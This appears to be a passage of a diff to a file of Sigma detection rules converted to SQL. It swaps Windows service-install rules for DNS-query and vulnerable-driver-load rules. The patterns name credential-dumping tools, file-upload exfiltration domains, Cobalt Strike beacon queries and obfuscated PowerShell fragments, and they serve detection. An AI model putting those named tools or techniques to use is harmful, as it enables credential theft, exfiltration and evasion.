'\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 
'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", 
+ "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath 
LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that 
was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", + "status": "experimental", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND 
EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", 
- "attack.t1562" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec 
service installation and execution events (service and Sysmon)", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects Obfuscated Powershell via 
use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + 
"attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE 